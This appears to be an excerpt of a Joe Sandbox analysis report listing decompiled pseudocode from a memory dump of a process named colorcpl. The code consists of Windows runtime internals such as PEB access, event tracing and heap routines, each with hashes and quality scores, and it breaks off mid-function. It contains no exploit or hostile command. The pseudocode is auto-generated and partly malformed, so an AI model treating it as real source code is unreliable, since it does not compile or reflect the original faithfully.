                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                • Instruction ID: 41ce773c92b1e8424dc4f788bf1a6f336b758bd42a1494df1bb491ec3bcd2498
                                                                                                • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                                                                • Instruction Fuzzy Hash: 0601D632A10784DFD7A2975DC804F997BD8EF41754F091071F9148B6B1E675C800D654
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 46%
                                                                                                			E06EAFE87(intOrPtr __ecx) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				signed int _v24;
                                                                                                				intOrPtr _v28;
                                                                                                				short _v54;
                                                                                                				char _v60;
                                                                                                				signed char* _t21;
                                                                                                				intOrPtr _t27;
                                                                                                				intOrPtr _t32;
                                                                                                				intOrPtr _t33;
                                                                                                				intOrPtr _t34;
                                                                                                				signed int _t35;
                                                                                                
                                                                                                				_v8 =  *0x6f0d360 ^ _t35;
                                                                                                				_v16 = __ecx;
                                                                                                				_v54 = 0x1722;
                                                                                                				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
                                                                                                				_v28 =  *((intOrPtr*)(__ecx + 4));
                                                                                                				_v20 =  *((intOrPtr*)(__ecx + 0xc));
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t21 = 0x7ffe0382;
                                                                                                				} else {
                                                                                                					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
                                                                                                				}
                                                                                                				_push( &_v60);
                                                                                                				_push(0x10);
                                                                                                				_push(0x20402);
                                                                                                				_push( *_t21 & 0x000000ff);
                                                                                                				return E06E5B640(E06E59AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                			}

















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3168338773944e5adf817868c0b3f423aaf691b7660ddd8a2ea70e6198478577
                                                                                                • Instruction ID: 9a206ad76f9e8ca9f47c2b3b0ce0446f26efd60431fc2df2faf12215ca95bc0e
                                                                                                • Opcode Fuzzy Hash: 3168338773944e5adf817868c0b3f423aaf691b7660ddd8a2ea70e6198478577
                                                                                                • Instruction Fuzzy Hash: 86014F70A0030CAFCB54DFA8D946A6EB7B4EF08314F105159A914DB382D635E901CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 48%
                                                                                                			E06EE8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				short _v50;
                                                                                                				char _v56;
                                                                                                				signed char* _t18;
                                                                                                				intOrPtr _t24;
                                                                                                				intOrPtr _t30;
                                                                                                				intOrPtr _t31;
                                                                                                				signed int _t32;
                                                                                                
                                                                                                				_t29 = __edx;
                                                                                                				_v8 =  *0x6f0d360 ^ _t32;
                                                                                                				_v16 = __ecx;
                                                                                                				_v50 = 0x1c2c;
                                                                                                				_v24 = _a4;
                                                                                                				_v20 = _a8;
                                                                                                				_v12 = __edx;
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t18 = 0x7ffe0386;
                                                                                                				} else {
                                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                				}
                                                                                                				_push( &_v56);
                                                                                                				_push(0x10);
                                                                                                				_push(0x402);
                                                                                                				_push( *_t18 & 0x000000ff);
                                                                                                				return E06E5B640(E06E59AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                			}
















                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5ef879ce221deda0ce382cf47f2425eca8abc87f7c35b5d869262c22956cf3f1
                                                                                                • Instruction ID: c2ad603a3debcefc29f11cde3b1f6657252a5aae7122961a25857ca73218bba9
                                                                                                • Opcode Fuzzy Hash: 5ef879ce221deda0ce382cf47f2425eca8abc87f7c35b5d869262c22956cf3f1
                                                                                                • Instruction Fuzzy Hash: 7701E174A0134CAFDB44DFA8D945AAEB7B4EF48300F505459B915EB381EA74DA00CB95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 48%
                                                                                                			E06ED131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				short _v50;
                                                                                                				char _v56;
                                                                                                				signed char* _t18;
                                                                                                				intOrPtr _t24;
                                                                                                				intOrPtr _t30;
                                                                                                				intOrPtr _t31;
                                                                                                				signed int _t32;
                                                                                                
                                                                                                				_t29 = __edx;
                                                                                                				_v8 =  *0x6f0d360 ^ _t32;
                                                                                                				_v20 = _a4;
                                                                                                				_v12 = _a8;
                                                                                                				_v24 = __ecx;
                                                                                                				_v16 = __edx;
                                                                                                				_v50 = 0x1021;
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t18 = 0x7ffe0380;
                                                                                                				} else {
                                                                                                					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                				}
                                                                                                				_push( &_v56);
                                                                                                				_push(0x10);
                                                                                                				_push(0x20402);
                                                                                                				_push( *_t18 & 0x000000ff);
                                                                                                				return E06E5B640(E06E59AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
                                                                                                			}


                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: e0ff0a8fa44e43054c1dfb849c371003f3f9377e8f97046be8f88c19318e312b
                                                                                                • Instruction ID: ce07a1f72dbe91835727ff603707318eb4d7e90ecb8bcf4d41bf809766469b2c
                                                                                                • Opcode Fuzzy Hash: e0ff0a8fa44e43054c1dfb849c371003f3f9377e8f97046be8f88c19318e312b
                                                                                                • Instruction Fuzzy Hash: CD011D71A0134CAFDB84DFA9D945AAEB7F4FF08700F414059F915EB341E6749A00CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 46%
                                                                                                			E06ED1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				intOrPtr _v20;
                                                                                                				short _v46;
                                                                                                				char _v52;
                                                                                                				signed char* _t15;
                                                                                                				intOrPtr _t21;
                                                                                                				intOrPtr _t27;
                                                                                                				intOrPtr _t28;
                                                                                                				signed int _t29;
                                                                                                
                                                                                                				_t26 = __edx;
                                                                                                				_v8 =  *0x6f0d360 ^ _t29;
                                                                                                				_v12 = _a4;
                                                                                                				_v20 = __ecx;
                                                                                                				_v16 = __edx;
                                                                                                				_v46 = 0x1024;
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t15 = 0x7ffe0380;
                                                                                                				} else {
                                                                                                					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                				}
                                                                                                				_push( &_v52);
                                                                                                				_push(0xc);
                                                                                                				_push(0x20402);
                                                                                                				_push( *_t15 & 0x000000ff);
                                                                                                				return E06E5B640(E06E59AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
                                                                                                			}


                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c5c056b10eec24f9921fef6ea44a60071401302ef0a22b1515e1403b4ab779de
                                                                                                • Instruction ID: 2bc6fc5521b934924c50ec36131cf64707c7b549ccb20d3e87a0c1abffc1247b
                                                                                                • Opcode Fuzzy Hash: c5c056b10eec24f9921fef6ea44a60071401302ef0a22b1515e1403b4ab779de
                                                                                                • Instruction Fuzzy Hash: 41F04F71E14358EFDB44DFA8D845AAEB7B8AF08300F444059A915EB281E6349900CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E3C577(void* __ecx, char _a4) {
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t17;
                                                                                                				void* _t19;
                                                                                                				void* _t20;
                                                                                                				void* _t21;
                                                                                                
                                                                                                				_t18 = __ecx;
                                                                                                				_t21 = __ecx;
                                                                                                				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E06E3C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x6df11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                					__eflags = _a4;
                                                                                                					if(__eflags != 0) {
                                                                                                						L10:
                                                                                                						E06EE88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                                                						L9:
                                                                                                						return 0;
                                                                                                					}
                                                                                                					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                                					if(__eflags == 0) {
                                                                                                						goto L10;
                                                                                                					}
                                                                                                					goto L9;
                                                                                                				} else {
                                                                                                					return 1;
                                                                                                				}
                                                                                                			}


                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9cc328c5a6f4c0dd1b6618c150c541ee6c187f6c3b38763bd7740bb3cc879460
                                                                                                • Instruction ID: 6948ee62ab0a5890d54e2ef0395cdeb3b8ef3297599b2273136b2bf4965e3906
                                                                                                • Opcode Fuzzy Hash: 9cc328c5a6f4c0dd1b6618c150c541ee6c187f6c3b38763bd7740bb3cc879460
                                                                                                • Instruction Fuzzy Hash: 5CF0F0B2C253B0BED7F1AB14C40CB627BD89B04F38F64A467D615A3240C2A0C880C340
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 43%
                                                                                                			E06EE8D34(intOrPtr __ecx, intOrPtr __edx) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				intOrPtr _v16;
                                                                                                				short _v42;
                                                                                                				char _v48;
                                                                                                				signed char* _t12;
                                                                                                				intOrPtr _t18;
                                                                                                				intOrPtr _t24;
                                                                                                				intOrPtr _t25;
                                                                                                				signed int _t26;
                                                                                                
                                                                                                				_t23 = __edx;
                                                                                                				_v8 =  *0x6f0d360 ^ _t26;
                                                                                                				_v16 = __ecx;
                                                                                                				_v42 = 0x1c2b;
                                                                                                				_v12 = __edx;
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t12 = 0x7ffe0386;
                                                                                                				} else {
                                                                                                					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                				}
                                                                                                				_push( &_v48);
                                                                                                				_push(8);
                                                                                                				_push(0x20402);
                                                                                                				_push( *_t12 & 0x000000ff);
                                                                                                				return E06E5B640(E06E59AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                                                                                			}


                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 152b0d2ed7fd121edf25b11a81ddbb54e79e20c96ad2c2defeb21731ef610bfd
                                                                                                • Instruction ID: b913928bbac6396f4d1872dcfd16b6b53e7b466e5b7fa0c31b599a205ec937bd
                                                                                                • Opcode Fuzzy Hash: 152b0d2ed7fd121edf25b11a81ddbb54e79e20c96ad2c2defeb21731ef610bfd
                                                                                                • Instruction Fuzzy Hash: C6F0B470E0470C9FDB44EFB8D845AAE77B8EF08300F508099E915EB291DA34D900CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 54%
                                                                                                			E06E5927A(void* __ecx) {
                                                                                                				signed int _t11;
                                                                                                				void* _t14;
                                                                                                
                                                                                                				_t11 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                                                                                				if(_t11 != 0) {
                                                                                                					E06E5FA60(_t11, 0, 0x98);
                                                                                                					asm("movsd");
                                                                                                					asm("movsd");
                                                                                                					asm("movsd");
                                                                                                					asm("movsd");
                                                                                                					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                                                                                					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                                                                                					E06E592C6(_t11, _t14);
                                                                                                				}
                                                                                                				return _t11;
                                                                                                			}






                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                • Instruction ID: bff29887534104646487f3a26e40e6692a394329dbdc30ef4316340208c1abc9
                                                                                                • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                                • Instruction Fuzzy Hash: D9E0E5322406406BD7919E05DC84B43369D9F82720F014078B9041F283C6E5D80887A0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 94%
                                                                                                			E06ED2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                                                                                                				void* __esi;
                                                                                                				signed char _t3;
                                                                                                				signed char _t7;
                                                                                                				void* _t19;
                                                                                                
                                                                                                				_t17 = __ecx;
                                                                                                				_t3 = E06ECFD22(__ecx);
                                                                                                				_t19 =  *0x6f0849c - _t3; // 0x0
                                                                                                				if(_t19 == 0) {
                                                                                                					__eflags = _t17 -  *0x6f08748; // 0x0
                                                                                                					if(__eflags <= 0) {
                                                                                                						E06ED1C06();
                                                                                                						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                                                                                                						__eflags = _t3;
                                                                                                						if(_t3 != 0) {
                                                                                                							L5:
                                                                                                							__eflags =  *0x6f08724 & 0x00000004;
                                                                                                							if(( *0x6f08724 & 0x00000004) == 0) {
                                                                                                								asm("int3");
                                                                                                								return _t3;
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t3 =  *0x7ffe02d4 & 0x00000003;
                                                                                                							__eflags = _t3 - 3;
                                                                                                							if(_t3 == 3) {
                                                                                                								goto L5;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					return _t3;
                                                                                                				} else {
                                                                                                					_t7 =  *0x6f08724; // 0x0
                                                                                                					return E06EC8DF1(__ebx, 0xc0000374, 0x6f05890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                                                                                				}
                                                                                                			}








                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cca0c51dc442e7e6c4441e19854c05e92dc687388eb7d32e59ae0f9d3701148b
                                                                                                • Instruction ID: f886cc859f8dab1cbf6c4ee094c2ab40120180ff38c2ae8358e9636f3603b620
                                                                                                • Opcode Fuzzy Hash: cca0c51dc442e7e6c4441e19854c05e92dc687388eb7d32e59ae0f9d3701148b
                                                                                                • Instruction Fuzzy Hash: 58F0272A9253884FEEF25B2426213D13F89E7451D8B093445DBB017204D5348A87CF15
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E14F2E(void* __ecx, char _a4) {
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				void* _t17;
                                                                                                				void* _t19;
                                                                                                				void* _t20;
                                                                                                				void* _t21;
                                                                                                
                                                                                                				_t18 = __ecx;
                                                                                                				_t21 = __ecx;
                                                                                                				if(__ecx == 0) {
                                                                                                					L6:
                                                                                                					__eflags = _a4;
                                                                                                					if(__eflags != 0) {
                                                                                                						L8:
                                                                                                						E06EE88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                                                                                						L9:
                                                                                                						return 0;
                                                                                                					}
                                                                                                					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                                					if(__eflags != 0) {
                                                                                                						goto L9;
                                                                                                					}
                                                                                                					goto L8;
                                                                                                				}
                                                                                                				_t18 = __ecx + 0x30;
                                                                                                				if(E06E3C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x6df1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                                                					goto L6;
                                                                                                				} else {
                                                                                                					return 1;
                                                                                                				}
                                                                                                			}










                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0f6d1cf2e0ebb168c0795a94c6a5b0395ea3fe91bdc94d2cbbbabf1223b8d9f5
                                                                                                • Instruction ID: e93b86ae597a6a5ea2dfb7d9bfba2870e93cb7713eb43c1518cf5201c1e74f7c
                                                                                                • Opcode Fuzzy Hash: 0f6d1cf2e0ebb168c0795a94c6a5b0395ea3fe91bdc94d2cbbbabf1223b8d9f5
                                                                                                • Instruction Fuzzy Hash: BFF0BEB2931794DFD7F0D718C584B22B7D8AB0477CF557465D41587A64C724FE80C680
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 36%
                                                                                                			E06EE8CD6(intOrPtr __ecx) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v12;
                                                                                                				short _v38;
                                                                                                				char _v44;
                                                                                                				signed char* _t11;
                                                                                                				intOrPtr _t17;
                                                                                                				intOrPtr _t22;
                                                                                                				intOrPtr _t23;
                                                                                                				intOrPtr _t24;
                                                                                                				signed int _t25;
                                                                                                
                                                                                                				_v8 =  *0x6f0d360 ^ _t25;
                                                                                                				_v12 = __ecx;
                                                                                                				_v38 = 0x1c2d;
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t11 = 0x7ffe0386;
                                                                                                				} else {
                                                                                                					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                				}
                                                                                                				_push( &_v44);
                                                                                                				_push(0xffffffe4);
                                                                                                				_push(0x402);
                                                                                                				_push( *_t11 & 0x000000ff);
                                                                                                				return E06E5B640(E06E59AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                                                			}














                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c7cb875e97f0eed149bbe48719c7d6765e76bec582f79c3150c7d5855db98fb0
                                                                                                • Instruction ID: 87e5f1ef2328e0f681c1a0cc47f60f08e063df6458f1dea6d580d2b38c9420f0
                                                                                                • Opcode Fuzzy Hash: c7cb875e97f0eed149bbe48719c7d6765e76bec582f79c3150c7d5855db98fb0
                                                                                                • Instruction Fuzzy Hash: 70F08270A0434CAFDB44DBB8E946EAE77B8EF09200F50119AE915EB281EA34D900CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 88%
                                                                                                			E06E3746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                                                                                				signed int _t8;
                                                                                                				void* _t10;
                                                                                                				short* _t17;
                                                                                                				void* _t19;
                                                                                                				intOrPtr _t20;
                                                                                                				void* _t21;
                                                                                                
                                                                                                				_t20 = __esi;
                                                                                                				_t19 = __edi;
                                                                                                				_t17 = __ebx;
                                                                                                				if( *((char*)(_t21 - 0x25)) != 0) {
                                                                                                					if(__ecx == 0) {
                                                                                                						E06E2EB70(__ecx, 0x6f079a0);
                                                                                                					} else {
                                                                                                						asm("lock xadd [ecx], eax");
                                                                                                						if((_t8 | 0xffffffff) == 0) {
                                                                                                							_push( *((intOrPtr*)(__ecx + 4)));
                                                                                                							E06E595D0();
                                                                                                							L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                                                                                							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                                                                                							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                                                                                						}
                                                                                                					}
                                                                                                					L10:
                                                                                                				}
                                                                                                				_t10 = _t19 + _t19;
                                                                                                				if(_t20 >= _t10) {
                                                                                                					if(_t19 != 0) {
                                                                                                						 *_t17 = 0;
                                                                                                						return 0;
                                                                                                					}
                                                                                                				}
                                                                                                				return _t10;
                                                                                                				goto L10;
                                                                                                			}










                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 516d1adbefd8310809960e2ea59bbf23816194c68c9be6d0cef3b97bb999caad
                                                                                                • Instruction ID: c10cb6f9cbf05bb5f278be7498547ba7d15a3fd8f59335a9e46eb93f40f2cf07
                                                                                                • Opcode Fuzzy Hash: 516d1adbefd8310809960e2ea59bbf23816194c68c9be6d0cef3b97bb999caad
                                                                                                • Instruction Fuzzy Hash: D4F0B4749103A4AEDFD19B68C844BB9BB61AF04214F042155D871A7150E726E802C7CD
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 36%
                                                                                                			E06EE8B58(intOrPtr __ecx) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr _v20;
                                                                                                				short _v46;
                                                                                                				char _v52;
                                                                                                				signed char* _t11;
                                                                                                				intOrPtr _t17;
                                                                                                				intOrPtr _t22;
                                                                                                				intOrPtr _t23;
                                                                                                				intOrPtr _t24;
                                                                                                				signed int _t25;
                                                                                                
                                                                                                				_v8 =  *0x6f0d360 ^ _t25;
                                                                                                				_v20 = __ecx;
                                                                                                				_v46 = 0x1c26;
                                                                                                				if(E06E37D50() == 0) {
                                                                                                					_t11 = 0x7ffe0386;
                                                                                                				} else {
                                                                                                					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                                				}
                                                                                                				_push( &_v52);
                                                                                                				_push(4);
                                                                                                				_push(0x402);
                                                                                                				_push( *_t11 & 0x000000ff);
                                                                                                				return E06E5B640(E06E59AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                                                                                			}














                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7bf5763523742c580dd13fd4eec788aa848695d0cbd620678e99f2be3dac1f91
                                                                                                • Instruction ID: 565790a830400de547f4a919793de74f0843a68db8b3576a3a99a0b51bf488c9
                                                                                                • Opcode Fuzzy Hash: 7bf5763523742c580dd13fd4eec788aa848695d0cbd620678e99f2be3dac1f91
                                                                                                • Instruction Fuzzy Hash: 34F05EB0A14358ABEB84EBA8D906A6E73B8AF04200F441459EA159B281EA74D900C798
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E06E4A44B(signed int __ecx) {
                                                                                                				intOrPtr _t13;
                                                                                                				signed int _t15;
                                                                                                				signed int* _t16;
                                                                                                				signed int* _t17;
                                                                                                
                                                                                                				_t13 =  *0x6f07b9c; // 0x0
                                                                                                				_t15 = __ecx;
                                                                                                				_t16 = L06E34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                                                                                				if(_t16 == 0) {
                                                                                                					return 0;
